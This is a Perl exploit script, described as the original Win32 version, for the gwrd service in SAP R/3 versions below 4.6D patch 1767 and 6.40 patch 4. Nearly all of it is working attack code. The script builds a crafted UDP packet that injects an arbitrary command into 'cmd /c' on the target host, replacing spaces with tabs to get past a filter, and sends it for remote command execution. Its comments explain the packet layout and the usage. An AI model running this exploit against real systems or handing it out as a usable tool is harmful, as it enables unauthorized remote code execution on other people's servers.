Original Win32 version of the exploit for the gwrd bug in SAP versions below 4.6D patch 1767 and versions below 6.40 patch 4. It allows remote command execution on the target.
846933d938c8ba642bdaaea38a839367e37ffc3c050691922428ea4ccbdad92d
#!/usr/bin/perl -w
use IO::Socket;
#
# Executes the command given as the first argument as a child process of
# gwrd in Windows R/3 environments. The request packet must not contain the
# space character (0x20), so spaces in the command are rewritten as tabs
# (0x09) before it is embedded. The command interpreter ("cmd /c") must
# obviously be changed for other (UNIX) environments.
#
# 2003, FX of Phenoelit <fx@phenoelit.de>
#
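use strict;
use warnings;
$|=1;
# MSDN documentation of CreateProcess() :
# http://msdn.microsoft.com/library/en-us/dllproc/base/createprocess.asp
#
# Usage: <script> <command> <host> [port]
#   command - run on the target as "cmd /c (<command>) &&"
#   host    - target host running gwrd
#   port    - UDP port of gwrd, default 3300
#
# Argument checks keep the original (unterminated) die messages so perl
# still appends the file/line location.
my $command = shift or die "Give command";
my $host    = shift or die "Give host";
my $port    = shift || "3300";

# The request must not carry 0x20, so every space in the command becomes a
# tab (0x09). Nothing else in the command is escaped or validated; whatever
# is passed here reaches cmd.exe verbatim.
$command =~ s/ /\x09/g;

# Fixed header followed by the injected command line. The byte values are
# reproduced exactly as in the original; their meaning is not documented.
# NOTE(review): the header itself contains a 0x20 byte below, so the
# "no space" restriction presumably applies only to the command part —
# confirm before changing either.
my $request =
    "\x01".
    "\x02".
    "\x41\x42\x43".
    "\x01".
    "\x20".
    "\x00\x00\x00".
    "\x50\x50\x50\x50\x50\x50\x50\x50\x50\x50".
    "\x51\x51\x51\x51\x51\x51\x51\x51\x51\x51".
    "\x52\x52\x52\x52\x52\x52\x52\x52\x52\x52".
    "\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53".
    "\x54\x54\x09\x09\x09\x09\x09\x09\x09\x09".
    "A\x09\x09\x09\x09\x09\x09\x09\x09".
    "AAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00\x00\x00".
    # Command to be injected, must end with && since 0x00
    # termination does not work here
    "cmd\x09/c\x09(".$command.")\x09"."&&".
    "";

# Single UDP datagram, fire-and-forget: a clean return means the packet
# left this host, not that gwrd accepted it or that the command ran.
send_UDP($host, $port, $request);
exit 0;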
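# Send the prepared request to gwrd as one UDP datagram.
#
# Arguments:
#   $dest    - target host name or address
#   $port    - UDP port gwrd listens on
#   $payload - bytes to send; defaults to the file-level $request
#
# Dies if the socket cannot be created or the datagram cannot be handed to
# the kernel. UDP gives no acknowledgement: returning normally only means
# the packet was sent, not that the target received or acted on it.
sub send_UDP {
    my ($dest, $port, $payload) = @_;
    $payload = $request unless defined $payload;

    my $sock = IO::Socket::INET->new(
        Proto    => "udp",
        PeerAddr => $dest,
        PeerPort => "$port",
    );
    # IO::Socket leaves the failure reason in $@; report it instead of
    # a bare "cannot get socket".
    unless ($sock) { die "cannot get socket for $dest: $@" }
    $sock->autoflush(1);

    # print on a UDP socket can still fail (unreachable network, a
    # pending ICMP error); do not let that pass silently.
    print $sock $payload or die "cannot send to $dest:$port: $!";
    close $sock or die "close failed for $dest: $!";
    return;
}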